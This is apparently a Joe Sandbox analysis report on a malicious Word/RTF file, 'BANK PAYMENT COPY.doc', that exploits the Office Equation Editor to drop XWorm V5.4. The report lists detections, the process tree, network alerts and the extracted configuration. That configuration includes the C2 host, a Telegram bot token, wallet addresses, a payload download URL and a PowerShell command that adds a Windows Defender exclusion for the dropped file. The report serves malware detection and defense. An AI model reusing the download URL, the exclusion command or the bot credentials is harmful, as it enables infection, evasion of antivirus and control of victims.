Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BANK PAYMENT COPY.doc

Overview

General Information

Sample name:BANK PAYMENT COPY.doc
Analysis ID:1517840
MD5:2ac91d79a602fe37092bd6f878f4ae2d
SHA1:dfebe627e262e9edf9ee1fe2ebc706f4bd1356d3
SHA256:30096d5c8c4854311558a13ab825884fa3accfb27de30f3e2ba85e70bf0f6ab7
Tags:docuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3484 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3560 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obibingf24242.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Roaming\obibingf24242.exe" MD5: A4CD1FF60C7B69DF5A061DF3365E60C7)
        • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • obibingf24242.exe (PID: 3804 cmdline: "C:\Users\user\AppData\Roaming\obibingf24242.exe" MD5: A4CD1FF60C7B69DF5A061DF3365E60C7)
    • EQNEDT32.EXE (PID: 2196 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
{"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}
SourceRuleDescriptionAuthorStrings
BANK PAYMENT COPY.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x638b:$obj1: \objhtml
  • 0x63b0:$obj2: \objdata
  • 0x63cb:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x88a6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8943:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8a58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8438:$cnc4: POST / HTTP/1.1
      00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x130ca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1d3aa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7e60a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x13167:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1d447:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7e6a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1327c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1d55c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7e7bc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x12c5c:$cnc4: POST / HTTP/1.1
        • 0x1cf3c:$cnc4: POST / HTTP/1.1
        • 0x7e19c:$cnc4: POST / HTTP/1.1
        Process Memory Space: obibingf24242.exe PID: 3712JoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          7.2.obibingf24242.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            7.2.obibingf24242.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              7.2.obibingf24242.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8aa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8b43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8c58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8638:$cnc4: POST / HTTP/1.1
              5.2.obibingf24242.exe.265b624.3.unpackJoeSecurity_XWormYara detected XWormJoe Security
                5.2.obibingf24242.exe.265b624.3.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x6ca6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x6d43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x6e58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x6838:$cnc4: POST / HTTP/1.1
                Click to see the 8 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3560, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3560, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", ParentImage: C:\Users\user\AppData\Roaming\obibingf24242.exe, ParentProcessId: 3712, ParentProcessName: obibingf24242.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", ProcessId: 3788, ProcessName: powershell.exe
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obibingf24242.exe, NewProcessName: C:\Users\user\AppData\Roaming\obibingf24242.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obibingf24242.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3560, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", ProcessId: 3712, ProcessName: obibingf24242.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obibingf24242.exe, NewProcessName: C:\Users\user\AppData\Roaming\obibingf24242.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obibingf24242.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3560, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", ProcessId: 3712, ProcessName: obibingf24242.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", ParentImage: C:\Users\user\AppData\Roaming\obibingf24242.exe, ParentProcessId: 3712, ParentProcessName: obibingf24242.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", ProcessId: 3788, ProcessName: powershell.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3560, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obibingf24242.exe", ParentImage: C:\Users\user\AppData\Roaming\obibingf24242.exe, ParentProcessId: 3712, ParentProcessName: obibingf24242.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe", ProcessId: 3788, ProcessName: powershell.exe
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3484, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3788, TargetFilename: C:\Users\user\AppData\Local\Temp\5rqbpq45.3ns.ps1
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T08:30:00.566009+020020220501A Network Trojan was detected66.63.187.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T08:30:00.842927+020020220511A Network Trojan was detected66.63.187.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T08:30:08.034876+020028536851A Network Trojan was detected192.168.2.2249164149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T08:30:45.408668+020028531931Malware Command and Control Activity Detected192.168.2.2249173147.185.221.2255202TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: BANK PAYMENT COPY.docAvira: detected
                Source: http://66.63.187.123/txt/vnobizxc.exeAvira URL Cloud: Label: malware
                Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exeReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeReversingLabs: Detection: 50%
                Source: BANK PAYMENT COPY.docReversingLabs: Detection: 55%
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exeJoe Sandbox ML: detected
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: various-wages.gl.at.ply.gg
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: 55202
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: <123456789>
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: <Xwormmm>
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: XWorm V5.4
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: USB.exe
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: bc1q4ul0exh4vcd9z9fchkyc5rud8dtwsgkugpg2hu
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: 0xBAD33b9Ee3C66782641D7662A66557A167543AB8
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: TQHfQNjDo2mPrBMghaWA6fZLJ6zHLwXKn5
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: 7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpackString decryptor: 985088883

                Exploits

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.123 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49164 version: TLS 1.2
                Source: Binary string: fSgG.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr
                Source: Binary string: fSgG.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
